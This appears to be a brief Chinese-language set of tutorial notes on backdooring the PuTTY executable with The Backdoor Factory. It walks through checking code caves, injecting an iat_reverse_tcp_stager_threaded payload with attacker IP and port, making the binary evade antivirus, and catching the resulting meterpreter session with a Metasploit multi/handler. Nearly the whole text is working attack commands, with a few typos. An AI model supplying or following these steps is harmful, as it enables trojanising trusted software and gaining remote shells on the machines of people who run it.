backdoor-factory
检查二进制文件是否支持代码注入
Backdoor-factory -f putty.exe -S
检查代码洞大小
Backdoor-factory -f putty.exe -S
检查哪些payload可以注入
Backdoor-factory -f putty.exe -s show
经常使用的是iat_reverse_tcp_stager_threaded这个漏洞
Backdoor-factory -f putty.exe -s iat_reverse_tcp_stager_threaded -H 1.1.1.1 -P 6666
-h:本机IP地址,-p本机监听端口
会让你选择注入那个代码洞里
但是因为无pe文件,kali不能运行exe文件
需要以下操作*************************
wgtet https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html
Git clone https://githbu.com/secretsquirrel/the-backdoor-factory.git
Sudo pip install capstone
下载别人写好的文件,来调用backdoor-factory
然后进入the-backdoor-factory里面
cd the-backdoor-factory
使用别人写好的python程序进行免杀
检查是否支持注入
Python backdoor.py –file=/root/putty.exe–support_check
检查代码洞大小
Python backdoor.py -f /root/putty.exe -c -l 100
查看可支持注入shellcode类型
python backdoor.py -f /root/putty.exe show
注入代码,单洞注入
Python backdoor.py -f /root/putty.exe -s iat_reverse_tcp_stager_threaded -H 192.168.1.4 -P 4444
多洞注入
Python backdoor.py -f /root/putty.exe -s iat_reverse_tcp_stager_threaded -H 192.168.1.4 -P 4444 -J
尾部注入
Python backdoor.py -f /root/putty.exe -s
iat_reverse_tcp_stager_threaded -H 192.168.1.4 -P 4444 -a
然后启动
Msfconsole
Use exploit/multi/handler
Set payload windows/meterpreter/reverse_tcp
Set lhost 192.168.1.1
Set lport 4444
Exploit -j -z
然后检查sessions就可以